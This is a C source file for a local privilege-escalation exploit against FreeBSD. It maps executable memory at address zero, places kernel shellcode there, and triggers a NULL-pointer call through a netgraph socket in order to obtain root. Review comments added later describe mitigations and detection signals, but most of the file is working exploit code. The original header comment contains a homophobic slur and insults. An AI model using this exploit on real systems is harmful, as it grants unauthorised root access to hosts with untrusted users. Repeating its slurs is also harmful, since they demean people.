#include <sys/types.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
/* What kind of faggot has bluetooth enabled on his FreeBSD desktop, */
/* to which there are also untrusted users logged in? A vulnerability */
/* that could only ever be found by a twat of a 'security researcher' */
/*
 * payload: 26 raw bytes that main() hands to strncpy() as the source for a
 * write to address 0.
 *
 * NOTE(review): the byte pattern looks like 32-bit x86 machine code (frame
 * push at the start, leave/ret near the end, a %fs-relative load in between)
 * -- confirm with a disassembler in an isolated lab before relying on this.
 * Treat it as hostile code meant to run with kernel privilege, not as data.
 *
 * Defensive relevance: an opaque code blob staged in a page mapped at
 * address 0 is the classic shape of a kernel NULL-pointer-dereference
 * proof of concept. Kernels that refuse user mappings of page zero remove
 * the staging area this array depends on.
 */
char payload[] = { 0x55, 0x64, 0xa1, 0x00, 0x00, 0x00, 0x00, 0x8b,
0x00, 0x8b, 0x40, 0x20, 0xc7, 0x40, 0x04, 0x00,
0x00, 0x00, 0x00, 0x89, 0xe5, 0x31, 0xc0, 0xc9,
0xc3, 0x00 };
/*
 * main: proof-of-concept driver for what the header comment describes as a
 * FreeBSD Bluetooth-related local vulnerability.
 *
 * Visible sequence: open a file, request a writable+executable fixed mapping
 * at address 0, write bytes from `payload` there, create a PF_NETGRAPH
 * socket, shut it down, then print the effective uid.
 *
 * NOTE(review): presumably the socket()/shutdown() pair drives the kernel
 * through a NULL function pointer so that execution lands in the page mapped
 * at 0 -- the kernel side is not visible here; confirm against the relevant
 * advisory.
 *
 * Defender's view:
 *   - Mitigation: keep the kernel patched; on FreeBSD releases that provide
 *     it, security.bsd.map_at_zero=0 denies the page-zero mapping this
 *     program needs. Hosts with untrusted local users that do not need the
 *     netgraph/Bluetooth socket code can leave those modules unloaded.
 *   - Detection: an unprivileged process asking for a MAP_FIXED,
 *     PROT_EXEC mapping at address 0 and then opening a PF_NETGRAPH socket
 *     is a strong signal worth alerting on.
 *
 * argc and argv are unused. Always returns 0, whatever happened above.
 */
int main(int argc, char** argv)
{
int x;
int f;
int u;
/* Only referenced by the commented-out execve() below. */
char *args[] = {"/bin/sh", 0};
/* Hard-coded backing file; the descriptor is never checked or closed. */
f = open("/home/base3/test", O_RDWR);
/* Requests 2048 bytes at address 0, writable and executable. The return
 * value is discarded, so a refused mapping (the desired outcome on a
 * hardened host) goes unnoticed by this program. */
mmap(0, 2048, PROT_WRITE | PROT_EXEC, MAP_FIXED, f, 0);
/* Destination is the null address: undefined behaviour in C, and a fault
 * unless the mapping above actually succeeded. */
strncpy((char *)0, payload, 26);
/* The protocol-family constant is passed as both domain and protocol.
 * NOTE(review): presumably this combination selects the vulnerable socket
 * type -- confirm. */
x = socket(PF_NETGRAPH , SOCK_STREAM, PF_NETGRAPH);
/* Failure is only reported; execution continues with x == -1. */
if (x == -1)
printf("Fuck.\nAn error, number %d, happened\n", errno);
/* Called even when socket() failed above. */
shutdown (x, SHUT_RDWR);
/* Prints the effective uid afterwards. NOTE(review): presumably 0 here is
 * the author's success indicator; on a patched or hardened system the value
 * should be unchanged from the invoking user's. */
u = (int) geteuid();
printf ("Your uid is %d\n", u);
/* Left disabled by the author: would replace the process with /bin/sh. */
//execve(args[0], args, 0);
return 0;
}